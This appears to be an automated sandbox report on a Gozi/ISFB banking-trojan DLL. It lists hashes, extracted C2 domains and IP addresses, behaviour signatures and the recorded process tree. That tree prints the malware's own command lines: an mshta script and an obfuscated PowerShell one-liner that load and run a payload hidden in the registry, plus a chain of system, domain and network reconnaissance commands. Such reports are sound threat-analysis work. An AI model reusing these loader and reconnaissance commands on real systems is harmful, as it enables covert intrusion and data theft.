Analysis
max time kernel: 150s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-08-2022 17:54
Static task: static1
Behavioral task: behavioral1
Sample: de00c4750accf516704b8c0df265c24a.dll
Resource: win7-20220715-en

General
Target: de00c4750accf516704b8c0df265c24a.dll
Size: 300KB
MD5: de00c4750accf516704b8c0df265c24a
SHA1: eddbc6019ec7ba82d3c5b4c59efe797ff1df9f75
SHA256: 7dae6d6fb339b6114ffdd3c0b6bcaa2c9dab0a73979fec029801e9e16d7d06bc
SHA512: b0e6bbbdae36bd81f63dbab9296515d3a389fa6acb397476058ae202e66026ca8dc523fb35c6b7145a87d6e61e3833e396873e61e733152ccbaa39387bada96f
Malware Config
Extracted
Family: gozi_ifsb
Botnet: 3000
C2: config.edge.skype.com, 37.120.206.71, 37.120.206.84, 193.106.191.163
base_path: /drew/
build: 250240
exe_type: loader
extension: .jlk
server_id: 50

Extracted
Family: gozi_ifsb
Botnet: 3000
C2: 37.120.206.91, 37.120.206.95, havefuntxmm.at, 5.42.199.57, xerkdeoleone.at
base_path: /images/
build: 250240
exe_type: worker
extension: .jlk
server_id: 50
Signatures
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes: mshta.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation (mshta.exe)

Suspicious use of SetThreadContext (6 IoCs)
Processes: powershell.exe, Explorer.EXE
  PID 368 (powershell.exe) set thread context of PID 2228 (Explorer.EXE)
  PID 2228 (Explorer.EXE) set thread context of PID 3408 (RuntimeBroker.exe)
  PID 2228 (Explorer.EXE) set thread context of PID 3608 (RuntimeBroker.exe)
  PID 2228 (Explorer.EXE) set thread context of PID 3144 (RuntimeBroker.exe)
  PID 2228 (Explorer.EXE) set thread context of PID 4356 (RuntimeBroker.exe)
  PID 2228 (Explorer.EXE) set thread context of PID 4112 (cmd.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Discovers systems in the same network (1 TTP, 3 IoCs)
Processes: net.exe
  PID 3936 net.exe
  PID 4636 net.exe
  PID 3340 net.exe

Enumerates processes with tasklist (1 TTP, 1 IoC)

Gathers system information (1 TTP, 1 IoC)
Runs systeminfo.exe.

Runs net.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: regsvr32.exe, powershell.exe, Explorer.EXE
  PID 3396 regsvr32.exe (2 entries)
  PID 368 powershell.exe (2 entries)
  PID 2228 Explorer.EXE (all remaining entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
Processes: Explorer.EXE
  PID 2228 Explorer.EXE

Suspicious behavior: MapViewOfSection (6 IoCs)
Processes: powershell.exe, Explorer.EXE
  PID 368 powershell.exe
  PID 2228 Explorer.EXE (5 entries)

Suspicious use of AdjustPrivilegeToken (51 IoCs)
Processes: powershell.exe, Explorer.EXE, WMIC.exe, RuntimeBroker.exe, tasklist.exe
  PID 368 powershell.exe: Token SeDebugPrivilege
  PID 2228 Explorer.EXE: Token SeShutdownPrivilege, SeCreatePagefilePrivilege (each listed twice)
  PID 3036 WMIC.exe (the following set is listed twice): Token SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  PID 3408 RuntimeBroker.exe: Token SeShutdownPrivilege (listed three times)
  PID 4352 tasklist.exe: Token SeDebugPrivilege

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes: Explorer.EXE
  PID 2228 Explorer.EXE (2 entries)

Suspicious use of SetWindowsHookEx (1 IoC)
Processes: Explorer.EXE
  PID 2228 Explorer.EXE

Suspicious use of WriteProcessMemory (64 IoCs)
Processes: regsvr32.exe, mshta.exe, powershell.exe, csc.exe, csc.exe, Explorer.EXE, cmd.exe, cmd.exe, cmd.exe, cmd.exe
(source PID wrote to memory of target PID; duplicate rows collapsed with their count)
  5068 regsvr32.exe -> 3396 regsvr32.exe (3 entries)
  1104 mshta.exe -> 368 powershell.exe (2 entries)
  368 powershell.exe -> 4084 csc.exe (2 entries)
  4084 csc.exe -> 1064 cvtres.exe (2 entries)
  368 powershell.exe -> 1228 csc.exe (2 entries)
  1228 csc.exe -> 4548 cvtres.exe (2 entries)
  368 powershell.exe -> 2228 Explorer.EXE (4 entries)
  2228 Explorer.EXE -> 3408 RuntimeBroker.exe (4 entries)
  2228 Explorer.EXE -> 3608 RuntimeBroker.exe (4 entries)
  2228 Explorer.EXE -> 3144 RuntimeBroker.exe (4 entries)
  2228 Explorer.EXE -> 4356 RuntimeBroker.exe (4 entries)
  2228 Explorer.EXE -> 2028 cmd.exe (2 entries)
  2228 Explorer.EXE -> 4112 cmd.exe (6 entries)
  2028 cmd.exe -> 3036 WMIC.exe (2 entries)
  2028 cmd.exe -> 4648 more.com (2 entries)
  2228 Explorer.EXE -> 4524 cmd.exe (2 entries)
  2228 Explorer.EXE -> 4496 cmd.exe (2 entries)
  4496 cmd.exe -> 3512 systeminfo.exe (2 entries)
  2228 Explorer.EXE -> 632 cmd.exe (2 entries)
  2228 Explorer.EXE -> 5076 cmd.exe (2 entries)
  5076 cmd.exe -> 3936 net.exe (2 entries)
  2228 Explorer.EXE -> 3564 cmd.exe (2 entries)
  2228 Explorer.EXE -> 1960 cmd.exe (2 entries)
  1960 cmd.exe -> 4004 nslookup.exe (2 entries)
  2228 Explorer.EXE -> 1968 cmd.exe (1 entry)
Processes
(tree depth shown in brackets; cmdline is the full command line as recorded)
[1] C:\Windows\System32\RuntimeBroker.exe (PID 3408)
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\System32\RuntimeBroker.exe (PID 4356)
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
[1] C:\Windows\System32\RuntimeBroker.exe (PID 3144)
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
[1] C:\Windows\System32\RuntimeBroker.exe (PID 3608)
    cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding
[1] C:\Windows\Explorer.EXE (PID 2228)
    cmdline: C:\Windows\Explorer.EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\regsvr32.exe (PID 5068)
      cmdline: regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\regsvr32.exe (PID 3396)
        cmdline: /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
        - Suspicious behavior: EnumeratesProcesses
  [2] C:\Windows\System32\mshta.exe (PID 1104)
      cmdline: "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Fvgb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Fvgb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 368)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxgwsyrt -value gp; new-alias -name mjbjtinden -value iex; mjbjtinden ([System.Text.Encoding]::ASCII.GetString((rxgwsyrt "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 4084)
          cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tjqwukuz\tjqwukuz.cmdline"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 1064)
            cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAD0.tmp" "c:\Users\Admin\AppData\Local\Temp\tjqwukuz\CSCC10E6909227340609AFC522872CD7CB3.TMP"
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 1228)
          cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\evo4kxhq\evo4kxhq.cmdline"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 4548)
            cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB9B.tmp" "c:\Users\Admin\AppData\Local\Temp\evo4kxhq\CSCAD08408EB8DB4D1EA4C66DC9C3D7502F.TMP"
  [2] C:\Windows\system32\cmd.exe (PID 2028)
      cmdline: cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\Wbem\WMIC.exe (PID 3036)
        cmdline: wmic computersystem get domain
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\more.com (PID 4648)
        cmdline: more
  [2] C:\Windows\syswow64\cmd.exe (PID 4112)
      cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  [2] C:\Windows\system32\cmd.exe (PID 4524)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 4496)
      cmdline: cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\systeminfo.exe (PID 3512)
        cmdline: systeminfo.exe
        - Gathers system information
  [2] C:\Windows\system32\cmd.exe (PID 632)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 5076)
      cmdline: cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net.exe (PID 3936)
        cmdline: net view
        - Discovers systems in the same network
  [2] C:\Windows\system32\cmd.exe (PID 3564)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 1960)
      cmdline: cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\nslookup.exe (PID 4004)
        cmdline: nslookup 127.0.0.1
  [2] C:\Windows\system32\cmd.exe (PID 1968)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 4940)
      cmdline: cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
    [3] C:\Windows\system32\tasklist.exe (PID 4352)
        cmdline: tasklist.exe /SVC
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe (PID 3404)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 3068)
      cmdline: cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
    [3] C:\Windows\system32\driverquery.exe (PID 4932)
        cmdline: driverquery.exe
  [2] C:\Windows\system32\cmd.exe (PID 2444)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 4324)
      cmdline: cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
    [3] C:\Windows\system32\reg.exe (PID 5012)
        cmdline: reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
  [2] C:\Windows\system32\cmd.exe (PID 332)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 528)
      cmdline: cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
    [3] C:\Windows\system32\net.exe (PID 2148)
        cmdline: net config workstation
      [4] C:\Windows\system32\net1.exe (PID 2796)
          cmdline: C:\Windows\system32\net1 config workstation
  [2] C:\Windows\system32\cmd.exe (PID 3224)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 2408)
      cmdline: cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
    [3] C:\Windows\system32\nltest.exe (PID 440)
        cmdline: nltest /domain_trusts
  [2] C:\Windows\system32\cmd.exe (PID 3472)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 384)
      cmdline: cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
    [3] C:\Windows\system32\nltest.exe (PID 3188)
        cmdline: nltest /domain_trusts /all_trusts
  [2] C:\Windows\system32\cmd.exe (PID 1956)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 4600)
      cmdline: cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
    [3] C:\Windows\system32\net.exe (PID 4636)
        cmdline: net view /all /domain
        - Discovers systems in the same network
  [2] C:\Windows\system32\cmd.exe (PID 1960)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 3284)
      cmdline: cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
    [3] C:\Windows\system32\net.exe (PID 3340)
        cmdline: net view /all
        - Discovers systems in the same network
  [2] C:\Windows\system32\cmd.exe (PID 2584)
      cmdline: cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
  [2] C:\Windows\system32\cmd.exe (PID 5084)
      cmdline: cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C84E.bin1 > C:\Users\Admin\AppData\Local\Temp\C84E.bin & del C:\Users\Admin\AppData\Local\Temp\C84E.bin1"
Network
MITRE ATT&CK Enterprise v6
Downloads